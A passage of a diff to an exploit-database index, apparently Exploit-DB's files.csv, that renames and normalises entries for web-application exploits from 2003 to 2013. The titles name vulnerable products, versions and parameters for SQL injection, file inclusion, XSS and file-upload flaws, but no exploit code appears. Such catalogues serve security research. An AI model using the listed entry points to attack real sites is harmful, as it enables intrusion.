5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0 -5759,platforms/php/webapps/5759.txt,"Joomla! Component rapidrecipe - SQL Injection",2008-06-08,His0k4,php,webapps,0 +5759,platforms/php/webapps/5759.txt,"Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,php,webapps,0 -5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla! News Portal - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0 +5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0 5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,php,webapps,0 -5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 -5764,platforms/php/webapps/5764.txt,"telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 -5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 +5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - SQL Injection / Cross-Site Scripting",2008-06-09,JosS,asp,webapps,0 +5764,platforms/php/webapps/5764.txt,"Telephone Directory 2008 - SQL Injection / Cross-Site Scripting",2008-06-09,"CWH Underground",php,webapps,0 +5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 5766,platforms/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 -5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0 -5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 +5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0 +5768,platforms/php/webapps/5768.txt,"pNews 2.08 - 'shownews' Parameter SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,php,webapps,0 -5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0 -5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0 -5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0 -5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,php,webapps,0 -5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 -5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 +5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - Local File Inclusion",2008-06-10,Unohope,php,webapps,0 +5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - SQL Injection",2008-06-10,Unohope,php,webapps,0 +5773,platforms/php/webapps/5773.txt,"Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection",2008-06-10,Unohope,php,webapps,0 +5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - SQL Injection",2008-06-10,Unohope,php,webapps,0 +5775,platforms/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection",2008-06-10,JosS,asp,webapps,0 +5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - 'answer.php' SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 +5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting",2008-06-10,"CWH Underground",php,webapps,0 5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps,0 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",php,webapps,0 -5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,php,webapps,0 +5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection",2008-06-10,RMx,php,webapps,0 5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion",2008-06-11,"CWH Underground",php,webapps,0 -5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 +5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - 'toplists.php' SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 @@ -19039,7 +19046,7 @@ id,file,description,date,author,platform,type,port 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0 5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0 -5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0 +5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0 5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 @@ -19369,7 +19376,7 @@ id,file,description,date,author,platform,type,port 6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) SQL Injection",2008-09-12,r45c4l,php,webapps,0 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0 6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 -6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0 6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 @@ -19870,7 +19877,7 @@ id,file,description,date,author,platform,type,port 7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 -7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 +7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 @@ -20161,7 +20168,7 @@ id,file,description,date,author,platform,type,port 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 -7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection",2008-12-14,Osirys,php,webapps,0 +7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 @@ -20457,7 +20464,7 @@ id,file,description,date,author,platform,type,port 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 -7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 +7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 @@ -20882,7 +20889,7 @@ id,file,description,date,author,platform,type,port 8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0 8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0 8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0 -8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 +8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0 8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 @@ -21706,7 +21713,7 @@ id,file,description,date,author,platform,type,port 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart - (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0 +10302,platforms/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,php,webapps,0 10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 10305,platforms/php/webapps/10305.txt,"UBB.Threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 @@ -22941,7 +22948,7 @@ id,file,description,date,author,platform,type,port 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,cr4wl3r,php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 -12400,platforms/php/webapps/12400.txt,"Joomla! Component 'com_joomradio' - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 +12400,platforms/php/webapps/12400.txt,"Joomla! Component JoomRadio 1.0 - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0 @@ -23879,7 +23886,7 @@ id,file,description,date,author,platform,type,port 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps,0 -15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component 'com_elite_experts' - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80 +15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component Elite Experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80 15058,platforms/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,asp,webapps,0 15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,php,webapps,0 15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 @@ -24076,7 +24083,7 @@ id,file,description,date,author,platform,type,port 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",php,webapps,0 15488,platforms/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",php,webapps,0 15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0 -15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection",2010-11-12,Daikin,asp,webapps,0 +15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps,0 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0 15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0 15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0 @@ -24784,7 +24791,7 @@ id,file,description,date,author,platform,type,port 17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17680,platforms/php/webapps/17680.txt,"WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17681,platforms/php/webapps/17681.txt,"WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 +17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 @@ -25000,7 +25007,7 @@ id,file,description,date,author,platform,type,port 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Parameter Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 -18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 +18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0 18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 @@ -25506,7 +25513,7 @@ id,file,description,date,author,platform,type,port 20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 +20357,platforms/windows/webapps/20357.py,"Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20358,platforms/php/webapps/20358.py,"WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20360,platforms/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 @@ -26234,7 +26241,7 @@ id,file,description,date,author,platform,type,port 22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps,0 22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0 22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - Settings.inc.php Full Path Disclosure",2003-07-17,Bosen,php,webapps,0 -22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 +22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 - Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 @@ -27246,7 +27253,7 @@ id,file,description,date,author,platform,type,port 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - x-forwarded-for Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 -25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0 +25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,php,webapps,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0 @@ -27298,8 +27305,8 @@ id,file,description,date,author,platform,type,port 25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 -25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 -25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - system_footer.php Multiple Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 +25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 +25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 - Calendar_Scheduler.php Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0 @@ -27824,7 +27831,7 @@ id,file,description,date,author,platform,type,port 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 -25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 +25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 @@ -27851,7 +27858,7 @@ id,file,description,date,author,platform,type,port 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 -26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - auth.php SQL Injection",2005-07-20,GHC,php,webapps,0 +26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 @@ -28284,10 +28291,10 @@ id,file,description,date,author,platform,type,port 26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26589,platforms/php/webapps/26589.txt,"OvBB 0.x - thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26590,platforms/php/webapps/26590.txt,"OvBB 0.x - profile.php userid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 -26591,platforms/php/webapps/26591.txt,"efiction 